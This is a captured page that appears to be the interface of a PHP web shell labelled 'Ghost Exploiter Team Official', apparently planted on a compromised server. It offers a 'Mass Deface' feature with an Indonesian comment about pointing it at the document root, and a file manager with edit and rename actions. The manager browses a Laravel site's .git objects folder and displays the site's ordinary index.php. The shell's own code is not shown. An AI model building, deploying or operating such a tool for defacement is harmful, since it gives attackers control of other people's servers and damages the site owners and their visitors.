Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
.git
/
objects
/
36
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.gitignore
0.01KB
edt
ren
311b4b8614eeb9a36c05dc5
...
0.814KB
edt
ren
PhpProcess.php
2.438KB
edt
ren
api.php
0KB
edt
ren
app.php
0KB
edt
ren
composer.json
0.799KB
edt
ren
console.php
0.36KB
edt
ren
index.html
0.435KB
edt
ren
index.php
0.457KB
edt
ren
web.php
0.112KB
edt
ren
<?php use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); // Determine if the application is in maintenance mode... if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) { require $maintenance; } // Register the Composer autoloader... require __DIR__.'/../vendor/autoload.php'; // Bootstrap Laravel and handle the request... (require_once __DIR__.'/../bootstrap/app.php') ->handleRequest(Request::capture());